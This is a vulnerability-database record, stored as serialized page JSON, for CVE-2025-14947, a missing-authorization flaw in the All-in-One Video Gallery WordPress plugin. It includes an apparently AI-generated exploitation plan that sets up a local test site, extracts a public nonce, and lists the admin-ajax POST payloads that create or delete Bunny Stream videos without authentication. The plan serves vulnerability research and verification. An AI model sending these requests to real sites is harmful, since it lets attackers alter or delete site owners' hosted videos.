[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZPpHNAa1rhsyD4qZUgV4CjnC7dE0xsQ44_4rkcJN-00":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2025-14947","all-in-one-video-gallery-missing-authorization-to-unauthenticated-bunny-stream-video-creationdeletion","All-in-One Video Gallery \u003C= 4.6.4 - Missing Authorization to Unauthenticated Bunny Stream Video Creation\u002FDeletion","The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` functions in all versions up to, and including, 4.6.4. This makes it possible for unauthenticated attackers to create and delete videos on the Bunny Stream CDN associated with the victim's account, provided they can obtain a valid nonce which is exposed in public player templates.","all-in-one-video-gallery",null,"\u003C=4.6.4","4.7.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:L","Missing Authorization","2026-01-22 00:00:00","2026-01-23 17:26:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbedfb712-faf6-4131-b254-e6d7c367f49f?source=api-prod",2,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14947 (All-in-One Video Gallery)\n\n## 1. Vulnerability Summary\nThe **All-in-One Video Gallery** plugin (\u003C= 4.6.4) contains a missing authorization vulnerability in its Bunny Stream integration handlers. Specifically, the functions `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` are registered via `wp_ajax_nopriv_` and `wp_ajax_` hooks but do not perform capability checks (e.g., `current_user_can('manage_options')`). \n\nWhile these handlers do verify a WordPress nonce, the nonce is exposed to unauthenticated users in the JavaScript localization data of the public-facing video player. This allows an unauthenticated attacker to manipulate the victim's Bunny Stream account (creating or deleting videos).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Actions:** \n    *   `aiovg_create_bunny_stream_video`\n    *   `aiovg_get_bunny_stream_video`\n    *   `aiovg_delete_bunny_stream_video`\n*   **Authentication:** None (Unauthenticated via `wp_ajax_nopriv_`).\n*   **Preconditions:** \n    1.  The plugin must be configured with Bunny Stream API credentials (though the authorization bypass exists regardless).\n    2.  A valid nonce must be retrieved from the frontend.\n\n## 3. Code Flow\n1.  **Registration:** In the plugin's AJAX initialization (likely in `includes\u002Fadmin.php` or `includes\u002Fbunny-stream.php`), the hooks are registered:\n    ```php\n    add_action( 'wp_ajax_aiovg_create_bunny_stream_video', array( $this, 'ajax_callback_create_bunny_stream_video' ) );\n    add_action( 'wp_ajax_nopriv_aiovg_create_bunny_stream_video', array( $this, 'ajax_callback_create_bunny_stream_video' ) );\n    ```\n2.  **Handler Entry:** The function `ajax_callback_create_bunny_stream_video` is called.\n3.  **Nonce Check:** The function calls `check_ajax_referer( 'aiovg_ajax_nonce', 'nonce' );` (inferred action name).\n4.  **Missing Authorization:** The code proceeds to call the Bunny Stream API using `wp_remote_post` without checking `current_user_can`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the frontend player. Based on the plugin's architecture:\n1.  **Shortcode:** The player is rendered via the `[aiovg_video]` shortcode.\n2.  **Localization:** The plugin uses `wp_localize_script` to pass settings to `public\u002Fassets\u002Fjs\u002Fpublic.js`.\n3.  **Variable Name:** The localized object is typically `aiovg_public` (inferred).\n\n**Execution Steps for Agent:**\n1.  **Create a Page:**\n    `wp post create --post_type=page --post_title=\"Exploit Page\" --post_status=publish --post_content='[aiovg_video id=\"1\"]'` (Note: ID doesn't need to exist, just the shortcode).\n2.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n3.  **Extract:** Use `browser_eval` to extract the nonce:\n    ```javascript\n    window.aiovg_public?.nonce\n    ```\n    *Note: If `aiovg_public` is not the variable, search the page source for \"nonce\" or check `wp_localize_script` calls in `public\u002Fclass-all-in-one-video-gallery-public.php`.*\n\n## 5. Exploitation Strategy\nWe will demonstrate the vulnerability by attempting to \"delete\" a video. Even without a valid Bunny Stream API key, the response will indicate if we bypassed the nonce and authorization check (e.g., returning a Bunny API error vs. a WordPress 403 Forbidden).\n\n### Payload: Delete Video\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=aiovg_delete_bunny_stream_video&nonce=[EXTRACTED_NONCE]&id=[VIDEO_ID_OR_DUMMY]\n    ```\n\n### Payload: Create Video\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body:**\n    ```\n    action=aiovg_create_bunny_stream_video&nonce=[EXTRACTED_NONCE]&title=HackedVideo\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure All-in-One Video Gallery version 4.6.4 is installed.\n2.  **Enable Bunny Stream:** \n    `wp option update aiovg_bunny_stream_settings '{\"api_key\":\"12345\",\"library_id\":\"6789\"}' --format=json` (Dummy credentials are sufficient to reach the vulnerable code path).\n3.  **Create Trigger Page:** \n    `wp post create --post_type=page --post_content='[aiovg_video]' --post_status=publish`\n\n## 7. Expected Results\n*   **Success (Vulnerable):** The server returns a `200 OK` with a JSON body. The JSON will likely contain an error message from the Bunny API (e.g., \"Invalid API Key\"), which confirms the request **passed** the WordPress authorization check and attempted the outbound API call.\n*   **Failure (Fixed):** The server returns a `403 Forbidden` or a JSON error indicating \"You do not have permission to perform this action.\"\n\n## 8. Verification Steps\n1.  **Check HTTP Status:** Confirm the response is not a 403.\n2.  **Inspect Response Body:**\n    ```bash\n    # Example vulnerable response\n    {\"success\":false,\"data\":\"Authentication failed\"} \n    # (Shows it reached the API call phase)\n    ```\n3.  **Confirm Unauthenticated:** Ensure the `http_request` is sent **without** any WordPress session cookies.\n\n## 9. Alternative Approaches\nIf `aiovg_public` does not contain the nonce:\n1.  View the page source (`browser_get_content`) and search for any JSON object containing a `nonce` key.\n2.  Check the `aiovg_player` variable, as the description mentions \"player templates.\"\n3.  If `wp_ajax_nopriv_` is missing and it's only `wp_ajax_`, the severity would be lower (Subscriber-level), but the description specifically states \"unauthenticated.\" Confirm the `nopriv` hook exists in the source.","gemini-3-flash-preview","2026-05-05 02:44:48","2026-05-05 02:46:33",{"type":30,"vulnerable_version":31,"fixed_version":11,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":34,"fixed_zip":35,"all_tags":36},"plugin","4.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags\u002F4.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-video-gallery.4.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags\u002F4.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-video-gallery.4.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags"]